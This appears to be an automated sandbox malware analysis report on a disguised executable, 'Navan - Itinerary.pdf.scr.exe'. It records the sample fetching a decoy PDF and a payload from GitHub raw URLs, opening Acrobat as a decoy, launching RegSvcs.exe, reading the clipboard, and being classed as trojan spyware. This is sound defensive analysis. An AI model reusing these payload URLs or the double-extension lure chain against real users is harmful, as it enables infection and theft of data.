Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637597165.0000000000C63000.00000004.00000020.00020000.00000000.sdmp, Navan - Itinerary.pdf.scr.exe, 00000000.00000002.1638313764.0000000000C63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/6
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637597165.0000000000C63000.00000004.00000020.00020000.00000000.sdmp, Navan - Itinerary.pdf.scr.exe, 00000000.00000002.1638313764.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, Navan - Itinerary.pdf.scr.exe, 00000000.00000002.1638313764.0000000000C63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/NavanItinerary.pdf
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000002.1638313764.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, Navan - Itinerary.pdf.scr.exe, 00000000.00000002.1638313764.0000000000CD2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637597165.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, Navan - Itinerary.pdf.scr.exe, 00000000.00000002.1638313764.0000000000C83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion8z
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637597165.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, Navan - Itinerary.pdf.scr.exe, 00000000.00000002.1638313764.0000000000C83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiion=
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637597165.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, Navan - Itinerary.pdf.scr.exe, 00000000.00000002.1638313764.0000000000C83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/AromatcHEBUYRKOS/chekingbebra/refs/heads/main/millliiiiionY
Source: Navan - Itinerary.pdf.scr.exe, 00000000.00000003.1637597165.0000000000C63000.00000004.00000020.00020000.00000000.sdmp, Navan - Itinerary.pdf.scr.exe, 00000000.00000002.1638313764.0000000000C63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/u
Source: ReaderMessages.9.dr String found in binary or memory: https://www.adobe.co
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49768 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49784 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 13_2_004329C0
Contains functionality to read the clipboard data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard, 13_2_004329C0

System Summary
barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Navan - Itinerary.pdf.scr.exe
Detected potential crypto function
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: 0_2_00664EB1 0_2_00664EB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00408850 13_2_00408850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00423860 13_2_00423860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004218A0 13_2_004218A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0042DA53 13_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043ECA0 13_2_0043ECA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00437DF0 13_2_00437DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00409580 13_2_00409580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004266D0 13_2_004266D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043F720 13_2_0043F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00415799 13_2_00415799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00438810 13_2_00438810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041682D 13_2_0041682D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004288CB 13_2_004288CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043D880 13_2_0043D880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00430940 13_2_00430940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00403970 13_2_00403970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00420939 13_2_00420939
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004179C1 13_2_004179C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004231C2 13_2_004231C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004241C0 13_2_004241C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043B1D0 13_2_0043B1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004291DD 13_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043D980 13_2_0043D980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00405990 13_2_00405990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00422190 13_2_00422190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043D997 13_2_0043D997
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043D999 13_2_0043D999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004091B0 13_2_004091B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0042CA49 13_2_0042CA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00416263 13_2_00416263
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0040EA10 13_2_0040EA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00415220 13_2_00415220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0042CAD0 13_2_0042CAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004252DD 13_2_004252DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041B2E0 13_2_0041B2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00406280 13_2_00406280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043DA80 13_2_0043DA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041E290 13_2_0041E290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041CB40 13_2_0041CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043D34D 13_2_0043D34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00426B50 13_2_00426B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043DB60 13_2_0043DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00436B08 13_2_00436B08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0042830D 13_2_0042830D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0042CB11 13_2_0042CB11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00404320 13_2_00404320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0042CB22 13_2_0042CB22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00425327 13_2_00425327
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00408330 13_2_00408330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043F330 13_2_0043F330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0042A33F 13_2_0042A33F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0040DBD9 13_2_0040DBD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00424380 13_2_00424380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041FC75 13_2_0041FC75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041DC00 13_2_0041DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00429C2B 13_2_00429C2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004291DD 13_2_004291DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004074F0 13_2_004074F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0040ACF0 13_2_0040ACF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041148F 13_2_0041148F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0042AC90 13_2_0042AC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0040CD46 13_2_0040CD46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00437500 13_2_00437500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00422510 13_2_00422510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00417DEE 13_2_00417DEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041759F 13_2_0041759F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00425E70 13_2_00425E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00436E74 13_2_00436E74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00427603 13_2_00427603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00425E30 13_2_00425E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004286C0 13_2_004286C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043AEC0 13_2_0043AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004236E2 13_2_004236E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00405EE0 13_2_00405EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041DE80 13_2_0041DE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00402F50 13_2_00402F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00420F50 13_2_00420F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00438F59 13_2_00438F59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00406710 13_2_00406710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00423F20 13_2_00423F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00419F30 13_2_00419F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0041E7C0 13_2_0041E7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_004197C2 13_2_004197C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0042DFE9 13_2_0042DFE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0040A780 13_2_0040A780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00411F90 13_2_00411F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00418792 13_2_00418792
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_0043EFB0 13_2_0043EFB0
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00408030 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 00414400 appears 65 times
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: String function: 00661E3B appears 32 times
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Code function: String function: 00661DF7 appears 32 times
Uses 32bit PE files
Source: Navan - Itinerary.pdf.scr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/46@10/2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 13_2_00437DF0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW, 13_2_00437DF0
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\NavanItinerary[1].pdf Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe File created: C:\Users\user~1\AppData\Local\Temp\NavanItinerary.pdf Jump to behavior
Source: Navan - Itinerary.pdf.scr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Navan - Itinerary.pdf.scr.exe Virustotal: Detection: 11%
Source: Navan - Itinerary.pdf.scr.exe ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe "C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe"
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user~1\AppData\Local\Temp\NavanItinerary.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2264 --field-trial-handle=1500,i,10956060416113398511,1382103396325876287,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user~1\AppData\Local\Temp\NavanItinerary.pdf" Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2264 --field-trial-handle=1500,i,10956060416113398511,1382103396325876287,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Navan - Itinerary.pdf.scr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Navan - Itinerary.pdf.scr.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Navan - Itinerary.pdf.scr.exe Static file information: File size 1638400 > 1048576
Source: Navan - Itinerary.pdf.scr.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x16a800
Source: Navan - Itinerary.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Navan - Itinerary.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Navan - Itinerary.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Navan - Itinerary.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Navan - Itinerary.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
